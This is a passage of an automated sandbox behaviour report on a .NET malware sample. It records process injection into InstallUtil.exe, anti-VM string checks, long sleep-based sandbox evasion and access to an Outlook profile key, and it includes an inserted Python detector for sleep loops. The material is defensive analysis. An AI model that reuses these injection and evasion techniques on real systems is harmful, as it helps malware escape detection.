Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: tTXQS6DONV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: tTXQS6DONV.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

Source: Yara match | File source: 1.2.tTXQS6DONV.exe.5070000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3c45470.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.5070000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3c45470.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3c09450.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.tTXQS6DONV.exe.3bdf172.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2892478097.0000000005070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2881532887.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: tTXQS6DONV.exe PID: 7036, type: MEMORYSTR
Source: tTXQS6DONV.exe, g2Z1Et.cs | .Net Code: NewLateBinding.LateCall(obj7, (Type)null, "DynamicInvoke", new object[1] { new object[0] }, (string[])null, (Type[])null, (bool[])null, true)
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Code function: 1_2_055AD44F push ecx; retf EFCDh | 1_2_055AD5BA
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Code function: 1_2_05E7A1A9 push ecx; retf 0046h | 1_2_05E7A1CA
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Code function: 1_2_05E7D07C pushad ; retf | 1_2_05E7D0D5
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Code function: 1_2_05E7BAE0 pushad ; ret | 1_2_05E7BAF3
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Code function: 1_2_05E7F21F push eax; iretd | 1_2_05E7F22E
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Code function: 1_2_07427733 push edi; ret | 1_2_0742792E
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Code function: 1_2_0742A3ED push ds; retf 0040h | 1_2_0742A43E
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Code function: 1_2_0742793C push eax; ret | 1_2_0742796D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_030BD4B8 push es; ret | 5_2_030BD4B0
Source: tTXQS6DONV.exe | Static PE information: section name: .text entropy: 7.181596373025786
Source: tTXQS6DONV.exe, g2Z1Et.cs | High entropy of concatenated method names: 'a0WFn', 'Sp46G', 's0S4Aw', 'Jt97Hy', 'Yg17Km', 'j9C7Sr', 'g3CQj6', 'c8G1C', 'i2KPx', 'Qw1r5'
Source: tTXQS6DONV.exe, d8KDc.cs | High entropy of concatenated method names: 'r4WRg', 'Fe1z2', 's7STr', 'a8LYz', 's5TXw', 'm3NZb', 'c3G7N', 'Se45Z', 'Xp86K', 'Pc95G'
Source: tTXQS6DONV.exe, Sn3m8.cs | High entropy of concatenated method names: 'a8MCs', 'i5K4R', 'Ld63Y', 'y6F7D', 'k8L7Y', 'Hc18S', 'Mk7i5', 'z9A0X', 'q2CXm', 'Xq93Y'
Source: tTXQS6DONV.exe, q4T5B.cs | High entropy of concatenated method names: 'Fx43M', 'Qk86B', 'Lp59P', 'Hm74L', 'Kj96Y', 'Ar78M', 'r7JZk', 'Qo7m6', 'Wg35G', 'r0S1N'

                        Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\tTXQS6DONV.exe | File opened: C:\Users\user\Desktop\tTXQS6DONV.exe\:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        Source: Yara match | File source: Process Memory Space: tTXQS6DONV.exe PID: 7036, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory allocated: E60000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory allocated: 2990000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory allocated: 27A0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory allocated: 7E90000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory allocated: 8E90000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory allocated: 9060000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory allocated: A060000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory allocated: A3F0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory allocated: B3F0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory allocated: C3F0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 30B0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 32B0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 30E0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 600000
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599890
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599781
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599671
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599562
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599452
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599343
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599234
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599124
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599015
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598905
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598796
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598687
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598578
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598468
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598359
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598249
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598031
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597921
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597812
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597703
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597593
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597484
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597374
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597265
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597156
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597046
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596937
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596828
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596718
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596609
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596499
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596281
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596171
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596061
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595952
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595841
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595734
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595624
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595515
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595406
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595296
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595187
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595078
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594968
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594859
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Window / User API: threadDelayed 2274
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Window / User API: threadDelayed 7565
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Window / User API: threadDelayed 1389
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Window / User API: threadDelayed 8472
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe TID: 2196 | Thread sleep time: -26747778906878833s >= -30000s
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe TID: 2196 | Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6840 | Thread sleep count: 1389 > 30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6840 | Thread sleep count: 8472 > 30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -26747778906878833s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -600000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -599890s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -599781s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -599671s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -599562s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -599452s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -599343s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -599234s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -599124s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -599015s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -598905s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -598796s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -598687s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -598578s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -598468s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -598359s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -598249s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -598140s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -598031s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -597921s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -597812s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -597703s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -597593s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -597484s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -597374s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -597265s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -597156s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -597046s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -596937s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -596828s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -596718s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -596609s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -596499s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -596390s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -596281s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -596171s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -596061s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -595952s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -595841s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -595734s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -595624s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -595515s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -595406s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -595296s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -595187s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -595078s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -594968s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444 | Thread sleep time: -594859s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Thread delayed: delay time: 30000
Source: tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmp, tTXQS6DONV.exe, 00000001.00000002.2892478097.0000000005070000.00000004.08000000.00040000.00000000.sdmp, tTXQS6DONV.exe, 00000001.00000002.2881532887.0000000002991000.00000004.00000800.00020000.00000000.sdmp, tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VBoxTray
Source: tTXQS6DONV.exe, 00000001.00000002.2881532887.0000000002991000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q#SOFTWARE\VMware, Inc.\VMware VGAuth
Source: InstallUtil.exe, 00000005.00000002.3407260380.00000000014A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tTXQS6DONV.exe, 00000001.00000002.2888881438.0000000003BDF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory allocated: page read and write | page guard
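The delay series above has a distinctive shape: every request is about 597 s long and each one is roughly 110 ms shorter than the one before. Taking the report's delay values as milliseconds (an assumption), that is what a loop of the form "sleep until a deadline, re-read the clock, sleep again for whatever remains" produces when the sandbox shortens each Sleep call, which the API Interceptor entries later in this report ("Sleep call ... modified") make plausible. The Python below is an added example and not part of the Joe Sandbox report: it parses delay entries into per-process series and flags both a long-sleep threshold and the deadline-loop shape. The log lines are constructed from the values above, the notepad.exe control series is invented, and the 180 s threshold is an assumption.

```python
"""Sleep-loop analysis of 'Thread delayed' entries (added example, constructed input)."""
import re
from statistics import mean, pstdev
from typing import Dict, List

# Entry layout assumed: "Source: <process> | Thread delayed: delay time: <ms>".
LINE_RE = re.compile(r"Source:\s*(?P<proc>[^|]+?)\s*\|\s*Thread delayed: delay time:\s*(?P<ms>\d+)")

INSTALLUTIL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
BENIGN = r"C:\Windows\System32\notepad.exe"          # constructed control process

# Values taken from the report's InstallUtil.exe entries; the benign series is invented
# (a short poll loop that alternates between two small sleeps).
INSTALLUTIL_DELAYS = [597046, 596937, 596828, 596718, 596609, 596499, 596390, 596281, 596171,
                      596061, 595952, 595841, 595734, 595624, 595515, 595406, 595296, 595187,
                      595078, 594968, 594859]
BENIGN_DELAYS = [1000, 50, 1000, 50, 1000]

SAMPLE_LOG = "\n".join(
    [f"Source: {INSTALLUTIL} | Thread delayed: delay time: {ms}" for ms in INSTALLUTIL_DELAYS]
    + [f"Source: {BENIGN} | Thread delayed: delay time: {ms}" for ms in BENIGN_DELAYS]
)


def parse_delays(log: str) -> Dict[str, List[int]]:
    """Group delay values (milliseconds, assumed) by the process that requested them."""
    delays: Dict[str, List[int]] = {}
    for line in log.splitlines():
        m = LINE_RE.search(line)
        if m:
            delays.setdefault(m.group("proc"), []).append(int(m.group("ms")))
    return delays


def analyze(delays: List[int], long_sleep_ms: int = 180_000) -> dict:
    """Classify one process's delay series.

    deadline_loop is set when every request is a little shorter than the previous one
    by a near-constant step that is tiny relative to the request itself: the signature
    of code that recomputes (deadline - now) and sleeps again each time a sleep returns
    early, which is exactly what a sandbox that shortens Sleep() provokes.
    """
    if not delays:
        raise ValueError("empty delay series")
    steps = [a - b for a, b in zip(delays, delays[1:])]
    deadline_loop = (
        len(delays) >= 5
        and all(s > 0 for s in steps)                 # strictly shrinking requests
        and mean(steps) < 0.01 * delays[0]            # step is < 1% of the request
        and pstdev(steps) < 0.5 * mean(steps)         # and nearly constant
    )
    return {
        "count": len(delays),
        "max_ms": max(delays),
        "total_ms": sum(delays),
        "long_sleep": max(delays) >= long_sleep_ms,
        "deadline_loop": deadline_loop,
    }


def report(log: str) -> Dict[str, dict]:
    return {proc: analyze(series) for proc, series in parse_delays(log).items()}


if __name__ == "__main__":
    for proc, verdict in report(SAMPLE_LOG).items():
        print(proc, verdict)
```

The two checks are deliberately independent: a single 10-minute Sleep trips long_sleep without deadline_loop, while a deadline loop with short individual requests is still worth a look because its total dwell time, not any one request, is what defeats a fixed analysis window.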

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42C000
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 114D008
Source: C:\Users\user\Desktop\tTXQS6DONV.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
